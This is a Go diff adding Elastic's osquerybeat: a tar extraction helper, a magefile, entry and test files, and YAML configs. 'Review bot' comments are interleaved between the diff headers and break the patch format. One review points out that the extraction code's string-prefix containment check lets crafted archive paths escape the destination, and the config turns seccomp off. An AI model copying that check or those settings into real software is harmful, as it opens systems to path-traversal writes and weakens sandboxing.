+ writer, err := os.Create(path)
+ if err != nil {
+ return err
+ }
+
+ if _, err = io.Copy(writer, tarReader); err != nil {
+ return err
+ }
+
+ if err = os.Chmod(path, os.FileMode(header.Mode)); err != nil {
+ return err
+ }
+
+ if err = writer.Close(); err != nil {
+ return err
+ }
+ default:
+ return fmt.Errorf("unable to untar type=%c in file=%s", header.Typeflag, path)
+ }
+ }
+ return nil
+}
diff --git a/x-pack/osquerybeat/magefile.go b/x-pack/osquerybeat/magefile.go
new file mode 100644
index 00000000000..f16696dba5e
--- /dev/null
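Review bot: The containment test in Extract, `strings.HasPrefix(path, destinationDir)`, is a plain string prefix, so an entry whose cleaned path lands in a sibling directory sharing the same leading characters (destination `/opt/out`, result `/opt/out-other/x`, a constructed example) still passes, while a destination given as `./out` is rejected for every entry because Join cleans the path. Comparing on path components fixes both: `rel, err := filepath.Rel(destinationDir, path)` followed by `if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(os.PathSeparator)) {` in place of the current `if`. In the `tar.TypeReg` case the file returned by `os.Create` is never closed when `io.Copy` or `os.Chmod` fails, so those error paths need a `writer.Close()` before returning, and ExtractFile likewise never closes the gzip reader. shouldExtract calls `strings.HasPrefix(f, name)`, keeping an entry when a requested name starts with the entry name; if that is meant to pull in parent directories it needs a comment, because it also keeps any entry whose name is a partial prefix of a requested file.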
+++ b/x-pack/osquerybeat/magefile.go 
@@ -0,0 +1,97 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+// +build mage
+
+package main
+
+import (
+ "fmt"
+ "time"
+
+ "github.com/magefile/mage/mg"
+
+ devtools "github.com/elastic/beats/v7/dev-tools/mage"
+ osquerybeat "github.com/elastic/beats/v7/x-pack/osquerybeat/scripts/mage"
+
+ // mage:import
+ _ "github.com/elastic/beats/v7/dev-tools/mage/target/common"
+
+ // mage:import
+ _ "github.com/elastic/beats/v7/dev-tools/mage/target/pkg"
+ // mage:import
+ _ "github.com/elastic/beats/v7/dev-tools/mage/target/unittest"
+ // mage:import
+ _ "github.com/elastic/beats/v7/dev-tools/mage/target/integtest/notests"
+ // mage:import
+ _ "github.com/elastic/beats/v7/dev-tools/mage/target/test"
+)
+
+func init() {
+ devtools.BeatDescription = "Osquerybeat is a beat implementation for osquery."
+ devtools.BeatLicense = "Elastic License"
+}
+
+func Build() error {
+ params := devtools.DefaultBuildArgs()
+
+ // Building functionbeat manager
+ return devtools.Build(params)
+}
+
+// GolangCrossBuild build the Beat binary inside of the golang-builder.
+// Do not use directly, use crossBuild instead.
+func GolangCrossBuild() error {
+ return devtools.GolangCrossBuild(devtools.DefaultGolangCrossBuildArgs())
+}
+
+// BuildGoDaemon builds the go-daemon binary (use crossBuildGoDaemon).
+func BuildGoDaemon() error {
+ return devtools.BuildGoDaemon()
+}
+
+// CrossBuild cross-builds the beat for all target platforms.
+func CrossBuild() error {
+ return devtools.CrossBuild()
+}
+
+// CrossBuildGoDaemon cross-builds the go-daemon binary using Docker.
+func CrossBuildGoDaemon() error {
+ return devtools.CrossBuildGoDaemon()
+}
+
+// Package packages the Beat for distribution.
+// Use SNAPSHOT=true to build snapshots.
+// Use PLATFORMS to control the target platforms.
+// Use VERSION_QUALIFIER to control the version qualifier.
+func Package() {
+ start := time.Now()
+ defer func() { fmt.Println("package ran for", time.Since(start)) }()
+
+ devtools.MustUsePackaging("osquerybeat", "x-pack/osquerybeat/dev-tools/packaging/packages.yml")
+
+ // Add osquery distro binaries
+ osquerybeat.CustomizePackaging()
+
+ mg.Deps(Update, osquerybeat.FetchOsqueryDistros)
+ mg.Deps(CrossBuild, CrossBuildGoDaemon)
+ mg.SerialDeps(devtools.Package, TestPackages)
+}
+
+// TestPackages tests the generated packages (i.e. file modes, owners, groups).
+func TestPackages() error {
+ return devtools.TestPackages()
+}
+
+// Update is an alias for update:all. This is a workaround for
+// https://github.com/magefile/mage/issues/217.
+func Update() { mg.Deps(osquerybeat.Update.All) }
+
+// Fields is an alias for update:fields. This is a workaround for
+// https://github.com/magefile/mage/issues/217.
+func Fields() { mg.Deps(osquerybeat.Update.Fields) }
+
+// Config is an alias for update:config. This is a workaround for
+// https://github.com/magefile/mage/issues/217.
+func Config() { mg.Deps(osquerybeat.Update.Config) }
diff --git a/x-pack/osquerybeat/main.go b/x-pack/osquerybeat/main.go
new file mode 100644
index 00000000000..5889eb3ddbe
--- /dev/null
+++ b/x-pack/osquerybeat/main.go
@@ -0,0 +1,19 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package main
+
+import (
+ "os"
+
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/cmd"
+
+ _ "github.com/elastic/beats/v7/x-pack/osquerybeat/include"
+)
+
+func main() {
+ if err := cmd.RootCmd.Execute(); err != nil {
+ os.Exit(1)
+ }
+}
diff --git a/x-pack/osquerybeat/main_test.go b/x-pack/osquerybeat/main_test.go
new file mode 100644
index 00000000000..aac86e7fe18
--- /dev/null
+++ b/x-pack/osquerybeat/main_test.go
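Review bot: The comment `// Building functionbeat manager` inside Build in magefile.go looks like a leftover from another Beat's magefile and should describe this one, e.g. `// Build osquerybeat with the default build arguments.` Build is also the only exported target in the file without a doc comment, and mage prints that comment as the target's help text, so add `// Build builds the Beat binary.` above it. In Package, `osquerybeat.FetchOsqueryDistros` pulls the osquery binaries that end up in the packages; its implementation is outside this hunk, so a comment there saying where the integrity of those downloads is checked would help a reader of the packaging flow.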
@@ -0,0 +1,32 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package main
+
+// This file is mandatory as otherwise the osquerybeat.test binary is not generated correctly.
+
+import (
+ "flag"
+ "testing"
+
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/cmd"
+)
+
+var systemTest *bool
+
+func init() {
+ testing.Init()
+ systemTest = flag.Bool("systemTest", false, "Set to true when running system tests")
+
+ cmd.RootCmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("systemTest"))
+ cmd.RootCmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("test.coverprofile"))
+}
+
+// Test started when the test binary is started. Only calls main.
+func TestSystem(t *testing.T) {
+
+ if *systemTest {
+ main()
+ }
+}
diff --git a/x-pack/osquerybeat/osquerybeat.docker.yml b/x-pack/osquerybeat/osquerybeat.docker.yml
new file mode 100644
index 00000000000..479c2930632
--- /dev/null
+++ b/x-pack/osquerybeat/osquerybeat.docker.yml
@@ -0,0 +1,11 @@
+osquerybeat:
+ period: 1s
+
+processors:
+ - add_cloud_metadata: ~
+ - add_docker_metadata: ~
+
+output.elasticsearch:
+ hosts: '${ELASTICSEARCH_HOSTS:elasticsearch:9200}'
+ username: '${ELASTICSEARCH_USERNAME:}'
+ password: '${ELASTICSEARCH_PASSWORD:}'
diff --git a/x-pack/osquerybeat/osquerybeat.reference.yml b/x-pack/osquerybeat/osquerybeat.reference.yml
new file mode 100644
index 00000000000..00f83169d6a
--- /dev/null
+++ b/x-pack/osquerybeat/osquerybeat.reference.yml
@@ -0,0 +1,1191 @@ +################### Osquerybeat Configuration Example ######################### + +############################# Osquerybeat ###################################### + +osquerybeat: +# inputs: +# - type: osquery +# streams: +# - id: "E169F085-AC8B-48AF-9355-D2977030CE24" +# query: "select * from users" +# - id: "CFDE1EAA-0C6C-4D19-9EEC-45802B2A8C01" +# query: "select * from processes" +# interval: 1m + +# ============================== Process Security ============================== +# Disable seccomp system call filtering on Linux. +# Otherwise osquerybeat can't fork osqueryd with error: Failed to start osqueryd process: fork/exec ./osqueryd: operation not permitted +seccomp.enabled: false + +# ================================== General =================================== + +# The name of the shipper that publishes the network data. It can be used to group +# all the transactions sent by a single shipper in the web interface. +# If this options is not defined, the hostname is used. +#name: + +# The tags of the shipper are included in their own field with each +# transaction published. Tags make it easy to group servers by different +# logical properties. +#tags: ["service-X", "web-tier"] + +# Optional fields that you can specify to add additional information to the +# output. Fields can be scalar values, arrays, dictionaries, or any nested +# combination of these. +#fields: +# env: staging + +# If this option is set to true, the custom fields are stored as top-level +# fields in the output document instead of being grouped under a fields +# sub-dictionary. Default is false. +#fields_under_root: false + +# Internal queue configuration for buffering events to be published. +#queue: + # Queue type by name (default 'mem') + # The memory queue will present all available events (up to the outputs + # bulk_max_size) to the output, the moment the output is ready to server + # another batch of events. + #mem: + # Max number of events the queue can buffer. 
+ #events: 4096 + + # Hints the minimum number of events stored in the queue, + # before providing a batch of events to the outputs. + # The default value is set to 2048. + # A value of 0 ensures events are immediately available + # to be sent to the outputs. + #flush.min_events: 2048 + + # Maximum duration after which events are available to the outputs, + # if the number of events stored in the queue is < `flush.min_events`. + #flush.timeout: 1s + + # The disk queue stores incoming events on disk until the output is + # ready for them. This allows a higher event limit than the memory-only + # queue and lets pending events persist through a restart. + #disk: + # The directory path to store the queue's data. + #path: "${path.data}/diskqueue" + + # The maximum space the queue should occupy on disk. Depending on + # input settings, events that exceed this limit are delayed or discarded. + #max_size: 10GB + + # The maximum size of a single queue data file. Data in the queue is + # stored in smaller segments that are deleted after all their events + # have been processed. + #segment_size: 1GB + + # The number of events to read from disk to memory while waiting for + # the output to request them. + #read_ahead: 512 + + # The number of events to accept from inputs while waiting for them + # to be written to disk. If event data arrives faster than it + # can be written to disk, this setting prevents it from overflowing + # main memory. + #write_ahead: 2048 + + # The duration to wait before retrying when the queue encounters a disk + # write error. + #retry_interval: 1s + + # The maximum length of time to wait before retrying on a disk write + # error. If the queue encounters repeated errors, it will double the + # length of its retry interval each time, up to this maximum. + #max_retry_interval: 30s + + # The spool queue will store events in a local spool file, before + # forwarding the events to the outputs. + # + # Beta: spooling to disk is currently a beta feature. 
Use with care. + # + # The spool file is a circular buffer, which blocks once the file/buffer is full. + # Events are put into a write buffer and flushed once the write buffer + # is full or the flush_timeout is triggered. + # Once ACKed by the output, events are removed immediately from the queue, + # making space for new events to be persisted. + #spool: + # The file namespace configures the file path and the file creation settings. + # Once the file exists, the `size`, `page_size` and `prealloc` settings + # will have no more effect. + #file: + # Location of spool file. The default value is ${path.data}/spool.dat. + #path: "${path.data}/spool.dat" + + # Configure file permissions if file is created. The default value is 0600. + #permissions: 0600 + + # File size hint. The spool blocks, once this limit is reached. The default value is 100 MiB. + #size: 100MiB + + # The files page size. A file is split into multiple pages of the same size. The default value is 4KiB. + #page_size: 4KiB + + # If prealloc is set, the required space for the file is reserved using + # truncate. The default value is true. + #prealloc: true + + # Spool writer settings + # Events are serialized into a write buffer. The write buffer is flushed if: + # - The buffer limit has been reached. + # - The configured limit of buffered events is reached. + # - The flush timeout is triggered. + #write: + # Sets the write buffer size. + #buffer_size: 1MiB + + # Maximum duration after which events are flushed if the write buffer + # is not full yet. The default value is 1s. + #flush.timeout: 1s + + # Number of maximum buffered events. The write buffer is flushed once the + # limit is reached. + #flush.events: 16384 + + # Configure the on-disk event encoding. The encoding can be changed + # between restarts. + # Valid encodings are: json, ubjson, and cbor. 
+ #codec: cbor + #read: + # Reader flush timeout, waiting for more events to become available, so + # to fill a complete batch as required by the outputs. + # If flush_timeout is 0, all available events are forwarded to the + # outputs immediately. + # The default value is 0s. + #flush.timeout: 0s + +# Sets the maximum number of CPUs that can be executing simultaneously. The +# default is the number of logical CPUs available in the system. +#max_procs: + +# ================================= Processors ================================= + +# Processors are used to reduce the number of fields in the exported event or to +# enhance the event with external metadata. This section defines a list of +# processors that are applied one by one and the first one receives the initial +# event: +# +# event -> filter1 -> event1 -> filter2 ->event2 ... +# +# The supported processors are drop_fields, drop_event, include_fields, +# decode_json_fields, and add_cloud_metadata. +# +# For example, you can use the following processors to keep the fields that +# contain CPU load percentages, but remove the fields that contain CPU ticks +# values: +# +#processors: +# - include_fields: +# fields: ["cpu"] +# - drop_fields: +# fields: ["cpu.user", "cpu.system"] +# +# The following example drops the events that have the HTTP response code 200: +# +#processors: +# - drop_event: +# when: +# equals: +# http.code: 200 +# +# The following example renames the field a to b: +# +#processors: +# - rename: +# fields: +# - from: "a" +# to: "b" +# +# The following example tokenizes the string into fields: +# +#processors: +# - dissect: +# tokenizer: "%{key1} - %{key2}" +# field: "message" +# target_prefix: "dissect" +# +# The following example enriches each event with metadata from the cloud +# provider about the host machine. It works on EC2, GCE, DigitalOcean, +# Tencent Cloud, and Alibaba Cloud. 
+# +#processors: +# - add_cloud_metadata: ~ +# +# The following example enriches each event with the machine's local time zone +# offset from UTC. +# +#processors: +# - add_locale: +# format: offset +# +# The following example enriches each event with docker metadata, it matches +# given fields to an existing container id and adds info from that container: +# +#processors: +# - add_docker_metadata: +# host: "unix:///var/run/docker.sock" +# match_fields: ["system.process.cgroup.id"] +# match_pids: ["process.pid", "process.ppid"] +# match_source: true +# match_source_index: 4 +# match_short_id: false +# cleanup_timeout: 60 +# labels.dedot: false +# # To connect to Docker over TLS you must specify a client and CA certificate. +# #ssl: +# # certificate_authority: "/etc/pki/root/ca.pem" +# # certificate: "/etc/pki/client/cert.pem" +# # key: "/etc/pki/client/cert.key" +# +# The following example enriches each event with docker metadata, it matches +# container id from log path available in `source` field (by default it expects +# it to be /var/lib/docker/containers/*/*.log). +# +#processors: +# - add_docker_metadata: ~ +# +# The following example enriches each event with host metadata. +# +#processors: +# - add_host_metadata: ~ +# +# The following example enriches each event with process metadata using +# process IDs included in the event. +# +#processors: +# - add_process_metadata: +# match_pids: ["system.process.ppid"] +# target: system.process.parent +# +# The following example decodes fields containing JSON strings +# and replaces the strings with valid JSON objects. +# +#processors: +# - decode_json_fields: +# fields: ["field1", "field2", ...] 
+# process_array: false +# max_depth: 1 +# target: "" +# overwrite_keys: false +# +#processors: +# - decompress_gzip_field: +# from: "field1" +# to: "field2" +# ignore_missing: false +# fail_on_error: true +# +# The following example copies the value of message to message_copied +# +#processors: +# - copy_fields: +# fields: +# - from: message +# to: message_copied +# fail_on_error: true +# ignore_missing: false +# +# The following example truncates the value of message to 1024 bytes +# +#processors: +# - truncate_fields: +# fields: +# - message +# max_bytes: 1024 +# fail_on_error: false +# ignore_missing: true +# +# The following example preserves the raw message under event.original +# +#processors: +# - copy_fields: +# fields: +# - from: message +# to: event.original +# fail_on_error: false +# ignore_missing: true +# - truncate_fields: +# fields: +# - event.original +# max_bytes: 1024 +# fail_on_error: false +# ignore_missing: true +# +# The following example URL-decodes the value of field1 to field2 +# +#processors: +# - urldecode: +# fields: +# - from: "field1" +# to: "field2" +# ignore_missing: false +# fail_on_error: true + +# =============================== Elastic Cloud ================================ + +# These settings simplify using Osquerybeat with the Elastic Cloud (https://cloud.elastic.co/). + +# The cloud.id setting overwrites the `output.elasticsearch.hosts` and +# `setup.kibana.host` options. +# You can find the `cloud.id` in the Elastic Cloud web UI. +#cloud.id: + +# The cloud.auth setting overwrites the `output.elasticsearch.username` and +# `output.elasticsearch.password` settings. The format is `:`. +#cloud.auth: + +# ================================== Outputs =================================== + +# Configure what output to use when sending the data collected by the beat. + +# ---------------------------- Elasticsearch Output ---------------------------- +output.elasticsearch: + # Boolean flag to enable or disable the output module. 
+ #enabled: true + + # Array of hosts to connect to. + # Scheme and port can be left out and will be set to the default (http and 9200) + # In case you specify and additional path, the scheme is required: http://localhost:9200/path + # IPv6 addresses should always be defined as: https://[2001:db8::1]:9200 + hosts: ["localhost:9200"] + + # Set gzip compression level. + #compression_level: 0 + + # Configure escaping HTML symbols in strings. + #escape_html: false + + # Protocol - either `http` (default) or `https`. + #protocol: "https" + + # Authentication credentials - either API key or username/password. + #api_key: "id:api_key" + #username: "elastic" + #password: "changeme" + + # Dictionary of HTTP parameters to pass within the URL with index operations. + #parameters: + #param1: value1 + #param2: value2 + + # Number of workers per Elasticsearch host. + #worker: 1 + + # Optional index name. The default is "osquerybeat" plus date + # and generates [osquerybeat-]YYYY.MM.DD keys. + # In case you modify this pattern you must update setup.template.name and setup.template.pattern accordingly. + #index: "osquerybeat-%{[agent.version]}-%{+yyyy.MM.dd}" + + # Optional ingest node pipeline. By default no pipeline will be used. + #pipeline: "" + + # Optional HTTP path + #path: "/elasticsearch" + + # Custom HTTP headers to add to each request + #headers: + # X-My-Header: Contents of the header + + # Proxy server URL + #proxy_url: http://proxy:3128 + + # Whether to disable proxy settings for outgoing connections. If true, this + # takes precedence over both the proxy_url field and any environment settings + # (HTTP_PROXY, HTTPS_PROXY). The default is false. + #proxy_disable: false + + # The number of times a particular Elasticsearch index operation is attempted. If + # the indexing operation doesn't succeed after this many retries, the events are + # dropped. The default is 3. 
+ #max_retries: 3 + + # The maximum number of events to bulk in a single Elasticsearch bulk API index request. + # The default is 50. + #bulk_max_size: 50 + + # The number of seconds to wait before trying to reconnect to Elasticsearch + # after a network error. After waiting backoff.init seconds, the Beat + # tries to reconnect. If the attempt fails, the backoff timer is increased + # exponentially up to backoff.max. After a successful connection, the backoff + # timer is reset. The default is 1s. + #backoff.init: 1s + + # The maximum number of seconds to wait before attempting to connect to + # Elasticsearch after a network error. The default is 60s. + #backoff.max: 60s + + # Configure HTTP request timeout before failing a request to Elasticsearch. + #timeout: 90 + + # Use SSL settings for HTTPS. + #ssl.enabled: true + + # Controls the verification of certificates. Valid values are: + # * full, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. + # * strict, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. If the Subject Alternative + # Name is empty, it returns an error. + # * certificate, which verifies that the provided certificate is signed by a + # trusted authority (CA), but does not perform any hostname verification. + # * none, which performs no verification of the server's certificate. This + # mode disables many of the security benefits of SSL/TLS and should only be used + # after very careful consideration. It is primarily intended as a temporary + # diagnostic mechanism when attempting to resolve TLS errors; its use in + # production environments is strongly discouraged. + # The default value is full. 
+ #ssl.verification_mode: full + + # List of supported/valid TLS versions. By default all TLS versions from 1.1 + # up to 1.3 are enabled. + #ssl.supported_protocols: [TLSv1.1, TLSv1.2, TLSv1.3] + + # List of root certificates for HTTPS server verifications + #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] + + # Certificate for SSL client authentication + #ssl.certificate: "/etc/pki/client/cert.pem" + + # Client certificate key + #ssl.key: "/etc/pki/client/cert.key" + + # Optional passphrase for decrypting the certificate key. + #ssl.key_passphrase: '' + + # Configure cipher suites to be used for SSL connections + #ssl.cipher_suites: [] + + # Configure curve types for ECDHE-based cipher suites + #ssl.curve_types: [] + + # Configure what types of renegotiation are supported. Valid options are + # never, once, and freely. Default is never. + #ssl.renegotiation: never + + # Configure a pin that can be used to do extra validation of the verified certificate chain, + # this allow you to ensure that a specific certificate is used to validate the chain of trust. + # + # The pin is a base64 encoded string of the SHA-256 fingerprint. + #ssl.ca_sha256: "" + + # Enable Kerberos support. Kerberos is automatically enabled if any Kerberos setting is set. + #kerberos.enabled: true + + # Authentication type to use with Kerberos. Available options: keytab, password. + #kerberos.auth_type: password + + # Path to the keytab file. It is used when auth_type is set to keytab. + #kerberos.keytab: /etc/elastic.keytab + + # Path to the Kerberos configuration. + #kerberos.config_path: /etc/krb5.conf + + # Name of the Kerberos user. + #kerberos.username: elastic + + # Password of the Kerberos user. It is used when auth_type is set to password. + #kerberos.password: changeme + + # Kerberos realm. + #kerberos.realm: ELASTIC + +# ------------------------------ Logstash Output ------------------------------- +#output.logstash: + # Boolean flag to enable or disable the output module. 
+ #enabled: true + + # The Logstash hosts + #hosts: ["localhost:5044"] + + # Number of workers per Logstash host. + #worker: 1 + + # Set gzip compression level. + #compression_level: 3 + + # Configure escaping HTML symbols in strings. + #escape_html: false + + # Optional maximum time to live for a connection to Logstash, after which the + # connection will be re-established. A value of `0s` (the default) will + # disable this feature. + # + # Not yet supported for async connections (i.e. with the "pipelining" option set) + #ttl: 30s + + # Optionally load-balance events between Logstash hosts. Default is false. + #loadbalance: false + + # Number of batches to be sent asynchronously to Logstash while processing + # new batches. + #pipelining: 2 + + # If enabled only a subset of events in a batch of events is transferred per + # transaction. The number of events to be sent increases up to `bulk_max_size` + # if no error is encountered. + #slow_start: false + + # The number of seconds to wait before trying to reconnect to Logstash + # after a network error. After waiting backoff.init seconds, the Beat + # tries to reconnect. If the attempt fails, the backoff timer is increased + # exponentially up to backoff.max. After a successful connection, the backoff + # timer is reset. The default is 1s. + #backoff.init: 1s + + # The maximum number of seconds to wait before attempting to connect to + # Logstash after a network error. The default is 60s. + #backoff.max: 60s + + # Optional index name. The default index name is set to osquerybeat + # in all lowercase. + #index: 'osquerybeat' + + # SOCKS5 proxy server URL + #proxy_url: socks5://user:password@socks5-server:2233 + + # Resolve names locally when using a proxy server. Defaults to false. + #proxy_use_local_resolver: false + + # Use SSL settings for HTTPS. + #ssl.enabled: true + + # Controls the verification of certificates. 
Valid values are: + # * full, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. + # * strict, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. If the Subject Alternative + # Name is empty, it returns an error. + # * certificate, which verifies that the provided certificate is signed by a + # trusted authority (CA), but does not perform any hostname verification. + # * none, which performs no verification of the server's certificate. This + # mode disables many of the security benefits of SSL/TLS and should only be used + # after very careful consideration. It is primarily intended as a temporary + # diagnostic mechanism when attempting to resolve TLS errors; its use in + # production environments is strongly discouraged. + # The default value is full. + #ssl.verification_mode: full + + # List of supported/valid TLS versions. By default all TLS versions from 1.1 + # up to 1.3 are enabled. + #ssl.supported_protocols: [TLSv1.1, TLSv1.2, TLSv1.3] + + # List of root certificates for HTTPS server verifications + #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] + + # Certificate for SSL client authentication + #ssl.certificate: "/etc/pki/client/cert.pem" + + # Client certificate key + #ssl.key: "/etc/pki/client/cert.key" + + # Optional passphrase for decrypting the certificate key. + #ssl.key_passphrase: '' + + # Configure cipher suites to be used for SSL connections + #ssl.cipher_suites: [] + + # Configure curve types for ECDHE-based cipher suites + #ssl.curve_types: [] + + # Configure what types of renegotiation are supported. Valid options are + # never, once, and freely. Default is never. 
+ #ssl.renegotiation: never + + # Configure a pin that can be used to do extra validation of the verified certificate chain, + # this allow you to ensure that a specific certificate is used to validate the chain of trust. + # + # The pin is a base64 encoded string of the SHA-256 fingerprint. + #ssl.ca_sha256: "" + + # The number of times to retry publishing an event after a publishing failure. + # After the specified number of retries, the events are typically dropped. + # Some Beats, such as Filebeat and Winlogbeat, ignore the max_retries setting + # and retry until all events are published. Set max_retries to a value less + # than 0 to retry until all events are published. The default is 3. + #max_retries: 3 + + # The maximum number of events to bulk in a single Logstash request. The + # default is 2048. + #bulk_max_size: 2048 + + # The number of seconds to wait for responses from the Logstash server before + # timing out. The default is 30s. + #timeout: 30s + + + + +# ------------------------------- Console Output ------------------------------- +#output.console: + # Boolean flag to enable or disable the output module. + #enabled: true + + # Configure JSON encoding + #codec.json: + # Pretty-print JSON event + #pretty: false + + # Configure escaping HTML symbols in strings. + #escape_html: false + +# =================================== Paths ==================================== + +# The home path for the Osquerybeat installation. This is the default base path +# for all other path settings and for miscellaneous files that come with the +# distribution (for example, the sample dashboards). +# If not set by a CLI flag or in the configuration file, the default for the +# home path is the location of the binary. +#path.home: + +# The configuration path for the Osquerybeat installation. This is the default +# base path for configuration files, including the main YAML configuration file +# and the Elasticsearch template file. 
If not set by a CLI flag or in the +# configuration file, the default for the configuration path is the home path. +#path.config: ${path.home} + +# The data path for the Osquerybeat installation. This is the default base path +# for all the files in which Osquerybeat needs to store its data. If not set by a +# CLI flag or in the configuration file, the default for the data path is a data +# subdirectory inside the home path. +#path.data: ${path.home}/data + +# The logs path for a Osquerybeat installation. This is the default location for +# the Beat's log files. If not set by a CLI flag or in the configuration file, +# the default for the logs path is a logs subdirectory inside the home path. +#path.logs: ${path.home}/logs + +# ================================== Keystore ================================== + +# Location of the Keystore containing the keys and their sensitive values. +#keystore.path: "${path.config}/beats.keystore" + +# ================================= Dashboards ================================= + +# These settings control loading the sample dashboards to the Kibana index. Loading +# the dashboards are disabled by default and can be enabled either by setting the +# options here, or by using the `-setup` CLI flag or the `setup` command. +#setup.dashboards.enabled: false + +# The directory from where to read the dashboards. The default is the `kibana` +# folder in the home path. +#setup.dashboards.directory: ${path.home}/kibana + +# The URL from where to download the dashboards archive. It is used instead of +# the directory if it has a value. +#setup.dashboards.url: + +# The file archive (zip file) from where to read the dashboards. It is used instead +# of the directory when it has a value. +#setup.dashboards.file: + +# In case the archive contains the dashboards from multiple Beats, this lets you +# select which one to load. You can load all the dashboards in the archive by +# setting this to the empty string. 
+#setup.dashboards.beat: osquerybeat + +# The name of the Kibana index to use for setting the configuration. Default is ".kibana" +#setup.dashboards.kibana_index: .kibana + +# The Elasticsearch index name. This overwrites the index name defined in the +# dashboards and index pattern. Example: testbeat-* +#setup.dashboards.index: + +# Always use the Kibana API for loading the dashboards instead of autodetecting +# how to install the dashboards by first querying Elasticsearch. +#setup.dashboards.always_kibana: false + +# If true and Kibana is not reachable at the time when dashboards are loaded, +# it will retry to reconnect to Kibana instead of exiting with an error. +#setup.dashboards.retry.enabled: false + +# Duration interval between Kibana connection retries. +#setup.dashboards.retry.interval: 1s + +# Maximum number of retries before exiting with an error, 0 for unlimited retrying. +#setup.dashboards.retry.maximum: 0 + +# ================================== Template ================================== + +# A template is used to set the mapping in Elasticsearch +# By default template loading is enabled and the template is loaded. +# These settings can be adjusted to load your own template or overwrite existing ones. + +# Set to false to disable template loading. +#setup.template.enabled: true + +# Select the kind of index template. From Elasticsearch 7.8, it is possible to +# use component templates. Available options: legacy, component, index. +# By default osquerybeat uses the legacy index templates. +#setup.template.type: legacy + +# Template name. By default the template name is "osquerybeat-%{[agent.version]}" +# The template name and pattern has to be set in case the Elasticsearch index pattern is modified. +#setup.template.name: "osquerybeat-%{[agent.version]}" + +# Template pattern. By default the template pattern is "-%{[agent.version]}-*" to apply to the default index settings. 
+# The first part is the version of the beat and then -* is used to match all daily indices. +# The template name and pattern has to be set in case the Elasticsearch index pattern is modified. +#setup.template.pattern: "osquerybeat-%{[agent.version]}-*" + +# Path to fields.yml file to generate the template +#setup.template.fields: "${path.config}/fields.yml" + +# A list of fields to be added to the template and Kibana index pattern. Also +# specify setup.template.overwrite: true to overwrite the existing template. +#setup.template.append_fields: +#- name: field_name +# type: field_type + +# Enable JSON template loading. If this is enabled, the fields.yml is ignored. +#setup.template.json.enabled: false + +# Path to the JSON template file +#setup.template.json.path: "${path.config}/template.json" + +# Name under which the template is stored in Elasticsearch +#setup.template.json.name: "" + +# Overwrite existing template +# Do not enable this option for more than one instance of osquerybeat as it might +# overload your Elasticsearch with too many update requests. +#setup.template.overwrite: false + +# Elasticsearch template settings +setup.template.settings: + + # A dictionary of settings to place into the settings.index dictionary + # of the Elasticsearch template. For more details, please check + # https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping.html + #index: + #number_of_shards: 1 + #codec: best_compression + + # A dictionary of settings for the _source field. For more details, please check + # https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html + #_source: + #enabled: false + +# ====================== Index Lifecycle Management (ILM) ====================== + +# Configure index lifecycle management (ILM). These settings create a write +# alias and add additional settings to the index template. 
When ILM is enabled, +# output.elasticsearch.index is ignored, and the write alias is used to set the +# index name. + +# Enable ILM support. Valid values are true, false, and auto. When set to auto +# (the default), the Beat uses index lifecycle management when it connects to a +# cluster that supports ILM; otherwise, it creates daily indices. +#setup.ilm.enabled: auto + +# Set the prefix used in the index lifecycle write alias name. The default alias +# name is 'osquerybeat-%{[agent.version]}'. +#setup.ilm.rollover_alias: 'osquerybeat' + +# Set the rollover index pattern. The default is "%{now/d}-000001". +#setup.ilm.pattern: "{now/d}-000001" + +# Set the lifecycle policy name. The default policy name is +# 'beatname'. +#setup.ilm.policy_name: "mypolicy" + +# The path to a JSON file that contains a lifecycle policy configuration. Used +# to load your own lifecycle policy. +#setup.ilm.policy_file: + +# Disable the check for an existing lifecycle policy. The default is true. If +# you disable this check, set setup.ilm.overwrite: true so the lifecycle policy +# can be installed. +#setup.ilm.check_exists: true + +# Overwrite the lifecycle policy at startup. The default is false. +#setup.ilm.overwrite: false + +# =================================== Kibana =================================== + +# Starting with Beats version 6.0.0, the dashboards are loaded via the Kibana API. +# This requires a Kibana endpoint configuration. +setup.kibana: + + # Kibana Host + # Scheme and port can be left out and will be set to the default (http and 5601) + # In case you specify and additional path, the scheme is required: http://localhost:5601/path + # IPv6 addresses should always be defined as: https://[2001:db8::1]:5601 + #host: "localhost:5601" + + # Optional protocol and basic auth credentials. + #protocol: "https" + #username: "elastic" + #password: "changeme" + + # Optional HTTP path + #path: "" + + # Optional Kibana space ID. 
+ #space.id: "" + + # Custom HTTP headers to add to each request + #headers: + # X-My-Header: Contents of the header + + # Use SSL settings for HTTPS. + #ssl.enabled: true + + # Controls the verification of certificates. Valid values are: + # * full, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. + # * strict, which verifies that the provided certificate is signed by a trusted + # authority (CA) and also verifies that the server's hostname (or IP address) + # matches the names identified within the certificate. If the Subject Alternative + # Name is empty, it returns an error. + # * certificate, which verifies that the provided certificate is signed by a + # trusted authority (CA), but does not perform any hostname verification. + # * none, which performs no verification of the server's certificate. This + # mode disables many of the security benefits of SSL/TLS and should only be used + # after very careful consideration. It is primarily intended as a temporary + # diagnostic mechanism when attempting to resolve TLS errors; its use in + # production environments is strongly discouraged. + # The default value is full. 